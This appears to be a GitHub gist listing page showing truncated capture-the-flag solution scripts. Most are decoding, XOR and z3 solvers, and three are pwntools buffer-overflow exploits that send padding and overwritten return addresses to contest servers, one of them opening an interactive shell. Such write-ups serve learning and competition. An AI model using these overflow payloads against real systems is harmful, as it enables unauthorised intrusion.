This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from binascii import unhexlify | |
seven_segment_combinations = { | |
'1111110': '0', | |
'0110000': '1', | |
'1101101': '2', | |
'1111001': '3', | |
'0110011': '4', | |
'1011011': '5', | |
'1011111': '6', | |
'1110000': '7', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
from string import printable as ascii | |
from pprint import pprint | |
import sys | |
r = remote("178.62.9.10", 31350) | |
context.log_level = "critical" | |
flag = "" | |
def hamming_decoder(encoded_bits): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
module encoder( | |
input [3:0] data_in, | |
output [6:0] ham_out | |
); | |
wire p0, p1, p2; | |
assign p0 = data_in[3] ^ data_in[2] ^ data_in[0]; | |
assign p1 = data_in[3] ^ data_in[1] ^ data_in[0]; | |
assign p2 = data_in[2] ^ data_in[1] ^ data_in[0]; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from subprocess import Popen, PIPE | |
for x in range(599): | |
a = Popen(["objdump", "-d", f"bertanya{x}"], stdout=PIPE) | |
stdout = a.communicate()[0].splitlines() | |
n = stdout[16].decode().split(" ") | |
logic = n[-5] | |
num2 = n[-1].split(",")[0][1:] | |
num = stdout[17].decode().split(" ")[-1].split(",")[0][1:] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
encflag="3333333733333332333333373333333433333336333633333333333733363332333333373333333233333333333333343333333633363335333333373333333333333336333633363333333633363334333333333333333333333335333633363333333333333331333333333333333533333335333633363333333633363334333333333333333433333336333633333333333633333339333333363333333333333336333333393333333633363336333333373333333530343239353238362185622901563106" | |
raw = [encflag[i:i+16] for i in range(0, len(encflag), 16)] | |
chars = [chr(x) for x in range(0x61, 0x7b)] | |
digits = [chr(x) for x in range(0x30, 0x3a)] | |
asci=chars+digits | |
flag="" | |
for x in raw: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from z3 import * | |
a = "LTR" | |
b = "0D" | |
c = "S1" | |
s=Solver() | |
inp=[BitVec(f'v{x}', 16) for x in range(17)] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from pwn import xor | |
# bash echo -ne "133f29027034094a33253126395b3704" | xxd -r -p > hexflag.txt | |
hexflag=open("hexflag.txt", 'rb').read() | |
# Get The Key | |
key="" | |
flagformat="RTL{" | |
for x in range(4): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
from pwn import * | |
import struct | |
r = remote("cyberyoddha.baycyber.net",10003) | |
payload="A"*16 | |
payload+=struct.pack("<I",0xd3adb33f) | |
#print payload | |
r.sendline(payload) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
from pwn import * | |
b=ELF("./Overflow2") | |
r=remote("cyberyoddha.baycyber.net",10002) | |
payload='a'*28 | |
payload+='r\x91\x04\x08' | |
r.sendline(payload) | |
r.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
from pwn import * | |
import struct | |
r=remote("chall.ieeevit.org",9000) | |
r.sendline("./locked") | |
print r.recv() | |
payload="a"*20 | |
payload+=struct.pack("I",0x08049192) |
NewerOlder